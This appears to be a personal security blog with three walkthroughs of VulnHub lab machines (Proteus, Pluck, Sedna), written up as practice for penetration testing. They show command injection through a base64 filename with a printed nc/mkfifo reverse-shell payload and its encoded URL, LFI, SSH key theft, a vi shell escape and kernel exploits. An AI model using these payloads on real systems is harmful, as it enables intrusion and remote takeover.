<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I fire my burp, intercept the login request and swap the cookie value and dang!</span><br />
<span style="background-color: white;">Logged in as "malwareadm"</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Okay so till now its some good progress and I am pretty satisfied but whats next??</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The only additional functionality I notice is that this account has the ability to delete uploaded samples.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I run dirbuster/gobuster with the admin cookie included but no more pages, no more functionality apart from this!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">This was where I hit wall and couldn't think further.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The only thing that stood out was the deletion function.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I noticed that while deleting a file, the URL was as: http://proteusIP/delete/<base64-value></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">This base64 encoded value when decoded gave a timestamp sort of number with a "." character at the end.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">e.g. : "54752987376." (excluding quotes)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Here I spent ages what to do next!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">[Screenshot of the filenames which are stored in Proteus as samples]</span><br />
<a href="http://1.bp.blogspot.com/-5BWNkjc8Gek/WVeep93oLpI/AAAAAAAAKf0/5YlMLeyTmdoM6TjUfL9q-Gei-fZHmLcyACK4BGAYYCw/s1600/weird_filenames.PNG" imageanchor="1" style="background-color: white;"><img border="0" height="80" src="https://1.bp.blogspot.com/-5BWNkjc8Gek/WVeep93oLpI/AAAAAAAAKf0/5YlMLeyTmdoM6TjUfL9q-Gei-fZHmLcyACK4BGAYYCw/s640/weird_filenames.PNG" width="640" /></a><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Finally by a hint from my friend, I was pointed to a direction to fuzz the base64 decoded value so I started putting random stuff but got 404's instead.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Next I tried keeping a valid base64 encoded value but appending some characters and finally encoding it with linux command</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">e.g.: </span><br />
<span style="background-color: white;">"654239019471.id" --> dint work!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">"134253687542id" --> dint damn work!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">"45324599572.;id" --> dang!! This worked.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">(note that all the numeric values shown above pertain to valid file names, nonexistent file names wont work!)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I got id = 33 (www-data) user and this is where command injection lies!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I wasted no time by appending the netcat reverse shell but damn! that didnt work as the proteus netcat does not have "-e" option so what to do!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I appended the following to the file name I wanted to delete:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">"246526752853.;<span style="color: #222222; white-space: pre-wrap;">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"</span></span><br />
<span style="background-color: white; color: #222222; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #222222; white-space: pre-wrap;">The above value was base64 encoded and the request looked like below:</span><br />
<span style="background-color: white; color: #222222; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;">http://proteus_IP/delete/MjQ2NTI2NzUyODUzLjtybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC4wLjAuMSAxMjM0ID4vdG1wL2Y=</span></span><br />
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;"><br /></span></span>
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;">On the other hand, my netcat listener was fired up and dang!</span></span><br />
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;">Shell is OBTAINED :D</span></span><br />
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;"><br /></span></span>
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;"><a href="http://1.bp.blogspot.com/-vXzVwWuk9nE/WVefSJEfXcI/AAAAAAAAKgA/-aUcM3QNbZ4SHj7nR274I4R_5Z2fUWeRwCK4BGAYYCw/s1600/shelled.PNG" imageanchor="1"><img border="0" height="302" src="https://1.bp.blogspot.com/-vXzVwWuk9nE/WVefSJEfXcI/AAAAAAAAKgA/-aUcM3QNbZ4SHj7nR274I4R_5Z2fUWeRwCK4BGAYYCw/s640/shelled.PNG" width="640" /></a></span></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Next step: Privilege Escalation</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So, now we have an interactive shell and enumerating the user I see folder malwareadm in /home directory.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Under this folder is the js file which is automating the page visiting activity of malwareadm.</span><br />
<span style="background-color: white;">Reading this file we can see the URL encoded password of malwareadm</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I try loggin in as malwareadm and am successful!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Checking permission of malwareadm it seems it is a part of adm so just doing a sudo -i made me a root user!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Pwn4g3!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://3.bp.blogspot.com/-_-y0AjnHfEY/WVegJ33yD8I/AAAAAAAAKgM/fF21pPlOlUQ-Ql2HACUhhMof1QgXvw14QCK4BGAYYCw/s1600/rooting.PNG" imageanchor="1"><img border="0" height="236" src="https://3.bp.blogspot.com/-_-y0AjnHfEY/WVegJ33yD8I/AAAAAAAAKgM/fF21pPlOlUQ-Ql2HACUhhMof1QgXvw14QCK4BGAYYCw/s640/rooting.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The flag is under the /root folder and is a png file:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://4.bp.blogspot.com/-Kj83QqTs88w/WVegVgKIMdI/AAAAAAAAKgU/vMYviiWuM-UcVjw7NRaK95m57qam36a0ACK4BGAYYCw/s1600/flag.PNG" imageanchor="1"><img border="0" height="300" src="https://4.bp.blogspot.com/-Kj83QqTs88w/WVegVgKIMdI/AAAAAAAAKgU/vMYviiWuM-UcVjw7NRaK95m57qam36a0ACK4BGAYYCw/s640/flag.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The privilege escalation was kinda anti-climatic. I was anticipating more of a challenge there.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">My thoughts:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I clearly had lost directing once I logged in as malwareadm and even though the delete functionality stood out, I couldn't just think what to do next of it.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The machine provided a good level of challenge to me and I was quite thrilled and satisfied as I completed this challenge.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Thanks ivanvza for creating this vulnerable machine and thanks to vulnhub for hosting it.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"> -n1ghTcr4wl3r </span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<br /></div>
Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.com0tag:blogger.com,1999:blog-2734196536379076049.post-69986076905073554512017-03-17T16:38:00.003-07:002017-03-17T16:41:08.366-07:00Pluck w00t!<div dir="ltr" style="text-align: left;" trbidi="on">
Time to Pluck!<br />
<br />
Though a bit late, I decided to give this machine a try!<br />
<br />
As with all almost every machine I began with arp-scan/netdiscover:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-IPUYDQnOYek/WMxujf7ArII/AAAAAAAAKYQ/fZJYMQKTErswf5VNTXB0jTlxnb75FpeEgCLcB/s1600/pluck_arpScan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="55" src="https://4.bp.blogspot.com/-IPUYDQnOYek/WMxujf7ArII/AAAAAAAAKYQ/fZJYMQKTErswf5VNTXB0jTlxnb75FpeEgCLcB/s320/pluck_arpScan.PNG" width="320" /></a></div>
<br />
Once this is done, next I try to do a port scan on the host.<br />
<br />
I began with the tcp scan while upd scans taking more time ran in the background.<br />
Since port 80 was open, I ran nikto in other window.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-P2_BPrpEjC0/WMxvS5WkyCI/AAAAAAAAKYY/BempN5eu70UaBHGAo4yRKFfvBxtAOOEjgCLcB/s1600/pluck_Nmap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://4.bp.blogspot.com/-P2_BPrpEjC0/WMxvS5WkyCI/AAAAAAAAKYY/BempN5eu70UaBHGAo4yRKFfvBxtAOOEjgCLcB/s320/pluck_Nmap.PNG" width="320" /></a></div>
<br />
Post this is done, I move next to check banners on each service.<br />
<br />
SSH dint give any banner, neither mysql or llmnr protocol so I tried to enumerate the web.<br />
<br />
Just before I went to check the web service, I looked at the nikto results and they were interesting!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-WbCcduFvwXs/WMxv2IDzZxI/AAAAAAAAKYg/BgEw8F6MxK8qzSQZD4axTh3KOraofIxuwCEw/s1600/pluck_nikto_lfi.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://3.bp.blogspot.com/-WbCcduFvwXs/WMxv2IDzZxI/AAAAAAAAKYg/BgEw8F6MxK8qzSQZD4axTh3KOraofIxuwCEw/s320/pluck_nikto_lfi.PNG" width="320" /></a></div>
<br />
Now, this was very interesting, an LFI!!<br />
<br />
Meanwhile I had also tried fuzzing the admin page on the webservice and it revealed sql injection:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-DxYH7cedgiA/WMxwP7w70SI/AAAAAAAAKYk/EksrGEGGJisiby11LwXYnJ8whRKn9a_YQCLcB/s1600/pluck_sqlMessage.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://2.bp.blogspot.com/-DxYH7cedgiA/WMxwP7w70SI/AAAAAAAAKYk/EksrGEGGJisiby11LwXYnJ8whRKn9a_YQCLcB/s320/pluck_sqlMessage.PNG" width="320" /></a></div>
<br />
Now, I had two vectors so I thought lets begin with the LFI.<br />
<br />
Doing a /etc/passwd dumped all the contents!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ZycajneXpGo/WMxwdZfFSpI/AAAAAAAAKYo/fIy8EJ8x_Y4rdrXH3CjZx25IcEQ96dhcACLcB/s1600/pluck_lfi.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://3.bp.blogspot.com/-ZycajneXpGo/WMxwdZfFSpI/AAAAAAAAKYo/fIy8EJ8x_Y4rdrXH3CjZx25IcEQ96dhcACLcB/s320/pluck_lfi.PNG" width="320" /></a></div>
<br />
But Trying lfi on other files like apache logs etc was not getting possible (permission issue??)<br />
<br />
This was when something caught my eye.... There was an entry in /etc/passwd called backup-user!<br />
<br />
Moreover, there was a script to it!<br />
<br />
Reading the same script revealed another gateway.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-hMfeRC77Q9I/WMxw-6RznLI/AAAAAAAAKYw/dhdrO3DoDxgt8MdbLbLeAON43sK7Ph4MgCLcB/s1600/pluck_clue1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://3.bp.blogspot.com/-hMfeRC77Q9I/WMxw-6RznLI/AAAAAAAAKYw/dhdrO3DoDxgt8MdbLbLeAON43sK7Ph4MgCLcB/s320/pluck_clue1.PNG" width="320" /></a></div>
<br />
<br />
<br />
Tftp was going to come in picture but is it open! Dang! Nmap for udp scan showed me port 69 for tftp was open!<br />
<br />
Next I just get the backup file!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-znQSKsGv9z4/WMxxOsIwZfI/AAAAAAAAKY0/MR0xY6F9bAwUBkoRsOb32ISBxszLFHj9ACLcB/s1600/pluck_backup_tar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://2.bp.blogspot.com/-znQSKsGv9z4/WMxxOsIwZfI/AAAAAAAAKY0/MR0xY6F9bAwUBkoRsOb32ISBxszLFHj9ACLcB/s320/pluck_backup_tar.PNG" width="320" /></a></div>
<br />
<br />
Now checking the backup.tar file I see /home directory. Looking further there are ssh keys in paul's directory. I make permissions changes in the keys and try one by one all 4 private keys.<br />
<br />
key number 4 works for me and I login, but login is not a shell but a command line menu :D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-g6FC-MvIGzg/WMxySPfHvCI/AAAAAAAAKZI/2mqJV5beO5YJos-XcAdiuaSrtxfvJUQHACLcB/s1600/pluck_pdmenu.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://2.bp.blogspot.com/-g6FC-MvIGzg/WMxySPfHvCI/AAAAAAAAKZI/2mqJV5beO5YJos-XcAdiuaSrtxfvJUQHACLcB/s320/pluck_pdmenu.PNG" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-TsMJgnyojFQ/WMxxvH45qVI/AAAAAAAAKZA/uQD1KO-zosEKDfzHqDB_lY0LlUYTmY-1ACLcB/s1600/pluck_pdmenu_1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://1.bp.blogspot.com/-TsMJgnyojFQ/WMxxvH45qVI/AAAAAAAAKZA/uQD1KO-zosEKDfzHqDB_lY0LlUYTmY-1ACLcB/s320/pluck_pdmenu_1.PNG" width="320" /></a></div>
<br />
<br />
Next step, I look at the various options but Edit file caught my eye! The editor was vi editor in this case. So I can do a shell escape sequence.<br />
<br />
set shell=/bin/bash<br />
:shell<br />
<br />
And I get interactive session!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-LtNaKG-dGLo/WMxyGAxTt-I/AAAAAAAAKZE/3ONr8WnmmZ0hKxtvjAZ4cvai3rv5c_nZwCLcB/s1600/pluck_limited_shell.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="https://2.bp.blogspot.com/-LtNaKG-dGLo/WMxyGAxTt-I/AAAAAAAAKZE/3ONr8WnmmZ0hKxtvjAZ4cvai3rv5c_nZwCLcB/s320/pluck_limited_shell.PNG" width="320" /></a></div>
<br />
<br />
Next priv escalation!<br />
<br />
I see its a very new kernel.<br />
Searching exploits for this kernel gave me one DoS exploit but that wont work. I have to r00t!<br />
<br />
Checking file permissions I see setuid bit on exim! That could be one vector (maybe???)<br />
<br />
However, I thought why not try kernel exploits and dirtycow was a pure random guess!<br />
<br />
And it worked!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-JtdTod4w5Ls/WMxy_WfhO_I/AAAAAAAAKZQ/_M05_WG-SjsnRe3qjvrysXSlDMlQV0XKACLcB/s1600/pluck_privesc.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://2.bp.blogspot.com/-JtdTod4w5Ls/WMxy_WfhO_I/AAAAAAAAKZQ/_M05_WG-SjsnRe3qjvrysXSlDMlQV0XKACLcB/s320/pluck_privesc.PNG" width="243" /></a></div>
<br />
<br />
<br />
w00t w00t!<br />
<br />
And flag is captured!<br />
<br />
Overall an awesome machine and very satisfying! Reminds me of my oscp frustration days!<br />
<br />
Thanks vulnhub 4 hosting and <span style="background-color: #f7f7f7; color: #333333; font-family: "helvetica neue" , "helvetica" , "arial" , sans-serif; font-size: 14px;">@ryanoberto for making this VM!</span><br />
<span style="background-color: #f7f7f7; color: #333333; font-family: "helvetica neue" , "helvetica" , "arial" , sans-serif; font-size: 14px;"><br /></span>
-n!ghtcr4wl3r</div>
Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.com2tag:blogger.com,1999:blog-2734196536379076049.post-49387734215185487622017-03-17T01:02:00.002-07:002017-03-17T02:18:02.960-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
I picked up Sedna and these were the steps:<br />
<br />
Like any machine, starting with arp-scan to first know the machine IP:<br />
<br />
arp-scan -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-XAWlrTH_nnE/WMubUG6kH7I/AAAAAAAAKVY/qlS0e6l6VdcPdNj_S4_DUZlVPauYxFsPgCLcB/s1600/sedna_arpscan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://4.bp.blogspot.com/-XAWlrTH_nnE/WMubUG6kH7I/AAAAAAAAKVY/qlS0e6l6VdcPdNj_S4_DUZlVPauYxFsPgCLcB/s320/sedna_arpscan.png" width="320" /></a></div>
<br />
<br />
The machine got detected at 192.168.137.152<br />
<br />
The next step was to run an nmap scan:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CxwVTRI2SU0/WMubfWJi_pI/AAAAAAAAKVc/vPno3jCfGTULFRCfZeHim9WtutBHJSiqwCLcB/s1600/sedna_namp_scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://1.bp.blogspot.com/-CxwVTRI2SU0/WMubfWJi_pI/AAAAAAAAKVc/vPno3jCfGTULFRCfZeHim9WtutBHJSiqwCLcB/s320/sedna_namp_scan.png" width="320" /></a></div>
<br />
<br />
From here, I decided that I shall be concentrating on port 80.<br />
<br />
First checking the webpage:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-S7VxEyPPW1Y/WMucIdFjvDI/AAAAAAAAKVk/8qatVeGaNZI-wCFJHNS2wx2Wxji1CZYzQCLcB/s1600/sedna_sedna.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://4.bp.blogspot.com/-S7VxEyPPW1Y/WMucIdFjvDI/AAAAAAAAKVk/8qatVeGaNZI-wCFJHNS2wx2Wxji1CZYzQCLcB/s320/sedna_sedna.png" width="320" /></a></div>
<br />
<br />
I decided I shall have a peek at the robots.txt as well:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-XUPltUZ4KFs/WMub836sYdI/AAAAAAAAKVg/hvL2-XYy5ioaJuZUc-tjnNTp1W5T3NnYwCLcB/s1600/sedna_robots.txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://4.bp.blogspot.com/-XUPltUZ4KFs/WMub836sYdI/AAAAAAAAKVg/hvL2-XYy5ioaJuZUc-tjnNTp1W5T3NnYwCLcB/s320/sedna_robots.txt.png" width="320" /></a></div>
<br />
going to /Hackers gave 404 -Not found! Damn! :D<br />
<br />
Meanwhile in background, I was running gobuster.<br />
<br />
Doing web enumeration and checking web page sources dint reveal much!<br />
I decided to check my gobuster results:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-z7uEa9FlK9g/WMuceyvmfOI/AAAAAAAAKVo/AWrcNciPha0geTzqQjeJMQnTPbr2n8tyQCLcB/s1600/sedna_dirbuster.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://3.bp.blogspot.com/-z7uEa9FlK9g/WMuceyvmfOI/AAAAAAAAKVo/AWrcNciPha0geTzqQjeJMQnTPbr2n8tyQCLcB/s400/sedna_dirbuster.png" width="400" /></a></div>
<br />
Manually enumerating the dirbuster pointed folders, I quickly became clear that builderengine was running.<br />
<br />
Next, a searchsploit revealed exploit for arbitrary upload in BuilderEngine.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-S7VKNa79LLw/WMudy-sNyDI/AAAAAAAAKV4/OCeacapiXjsHA67fhxNyJw7LVoDmvCYhgCLcB/s1600/sedna_limitedShell_Exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://1.bp.blogspot.com/-S7VKNa79LLw/WMudy-sNyDI/AAAAAAAAKV4/OCeacapiXjsHA67fhxNyJw7LVoDmvCYhgCLcB/s320/sedna_limitedShell_Exploit.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Seems BuilderEngine is vulnerable to arbitrary file uploads on the directory:<br />
http://IP_Addr/themes/dashboard/assets/plugins/jquery-file-upload/server/php/<br />
<br />
I uploaded a simple php reverse shell to received reverse shell on listening port 443.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Y-JkPRVbYb0/WMudqwE36nI/AAAAAAAAKV8/pDIDUQvDQawgRkXtQfHLV6oyphAmxpbjQCEw/s1600/sedna_php_upload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://3.bp.blogspot.com/-Y-JkPRVbYb0/WMudqwE36nI/AAAAAAAAKV8/pDIDUQvDQawgRkXtQfHLV6oyphAmxpbjQCEw/s320/sedna_php_upload.png" width="281" /></a></div>
<br />
<br />
And I got the limited shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-czTgsxRtvoQ/WMufIpvTkwI/AAAAAAAAKWE/23YECAzci0Q21wHgbYleG1H3UxQ-83zJwCLcB/s1600/limited_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://4.bp.blogspot.com/-czTgsxRtvoQ/WMufIpvTkwI/AAAAAAAAKWE/23YECAzci0Q21wHgbYleG1H3UxQ-83zJwCLcB/s320/limited_shell.png" width="320" /></a></div>
<br />
<br />
And the first flag :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-FOIyUIAMFH8/WMue5NHVvrI/AAAAAAAAKWA/Jv2XGR53qsMQZ6x1EhlmNN_keHb92Pv4ACLcB/s1600/sedna_flag1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://3.bp.blogspot.com/-FOIyUIAMFH8/WMue5NHVvrI/AAAAAAAAKWA/Jv2XGR53qsMQZ6x1EhlmNN_keHb92Pv4ACLcB/s320/sedna_flag1.png" width="320" /></a></div>
<br />
/var/html<br />
cat flag.txt<br />
bfbb7e6e6e88d9ae66848b9aeac6b289<br />
<br />
Privilege Escalation:<br />
<br />
It became very clear that in world writeable files:<br />
<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/systemd/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/hugetlb/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/perf_event/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/blkio/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/freezer/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/devices/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/memory/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/cpuacct/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/cpu/cgroup.event_control<br />
--w--w--w- 1 root root 0 Mar 16 11:09 /sys/fs/cgroup/cpuset/cgroup.event_control<br />
-rw-rw-rw- 1 root root 0 Mar 16 11:09 /sys/kernel/security/apparmor/.access<br />
<div>
<br /></div>
<div>
Apparmor was writeable.</div>
<div>
<br /></div>
<div>
So taking some clue, I first tried overlayfs local exploit as it involves using the apparmor directory.</div>
<div>
<br /></div>
<div>
https://www.exploit-db.com/exploits/37292/</div>
<div>
<br /></div>
<div>
The exploit matched exactly with the kernel version and the release.</div>
<div>
<br /></div>
<div>
Running the exploit, it was giving its output in all fprintf statements but It failed.</div>
Checking the C code, it seems there is on "su" file in /bin by default!<br />
<br />
In this stage, I enumerated further on the misconfigurations part, I could not find much so ...<br />
<br />
So, back again I went back to check more exploits for the kernel and the OS release.<br />
<br />
The OS being 14.04 has another matching exploit:<br />
<br />
https://www.exploit-db.com/exploits/36746/<br />
<br />
For 14.04, the exploit apport worked just fine and root shell was achieved.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-cyup4kocWDc/WMuhBPuv-ZI/AAAAAAAAKWQ/KoLQksdXqqUWwNbfZoHwwyzXU_l0bTi0wCLcB/s1600/sedna_flag2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://2.bp.blogspot.com/-cyup4kocWDc/WMuhBPuv-ZI/AAAAAAAAKWQ/KoLQksdXqqUWwNbfZoHwwyzXU_l0bTi0wCLcB/s320/sedna_flag2.png" width="320" /></a></div>
<br />
And the next flag!<br />
<br />
/root<br />
cat flag.txt<br />
a10828bee17db751de4b936614558305<br />
<br />
There are two more flags, I am lazy so going to skip those in ths walkthrough...<br />
(Maybe I will do tat later...) :D</div>
Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.com2